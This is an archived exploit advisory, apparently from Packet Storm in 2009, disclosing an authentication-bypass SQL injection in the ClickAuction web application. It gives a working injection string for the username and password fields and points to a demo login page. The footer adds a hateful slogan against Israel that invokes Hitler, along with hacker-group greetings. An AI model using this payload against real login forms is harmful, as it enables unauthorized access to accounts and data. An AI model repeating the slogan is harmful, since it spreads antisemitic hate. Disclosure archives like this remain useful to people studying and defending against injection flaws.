ClickAuction SQL Injection

2009-01-27T00:00:00
ID PACKETSTORM:74354
Type packetstorm
Reporter R3d-D3v!L
Modified 2009-01-27T00:00:00

Description

                                        
                                            `[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢  
  
  
[☠]  
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability  
  
[☠]  
  
[~] Vendor: ClickAuction  
  
[☠]  
[☠] Software: ClickAuction  
  
[☠]  
[☠] author: ((я3d D3v!L))  
  
  
[☠]  
[☠] Date: 26.1.2009  
  
  
[☠]  
[☠] Home: www.ahacker.biz  
  
[☠]  
[☠] contact: N/A  
  
  
  
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠  
  
  
[☠] Exploit:  
  
  
  
[☠] username: r0' or ' 1=1--  
  
  
[☠] password: r0' or ' 1=1--  
  
  
  
  
[☠]login 4 d3m0:  
  
  
  
[☠]www.clicktech.com/clickauction/login.asp  
  
N073:  
FUCKEN !SRAEL DON'T FORGET ((☠HETLAR☠))  
  
GOD HELP GAZA!!  
  
[~]-----------------------------{str0ke}---------------------------------------------------  
  
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & M4NON  
[~]  
  
[~] spechial thanks : dolly & 7am3m & EL z0hery & SWEET NONO & {str0ke}  
  
[~]  
  
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller  
  
[~]  
  
[~] xp10.biz & ahacker.biz  
  
[~]  
  
  
[~]--------------------------------------------------------------------------------  
  
Get news, entertainment and everything you care about at Live.com. Check it out!  
  
`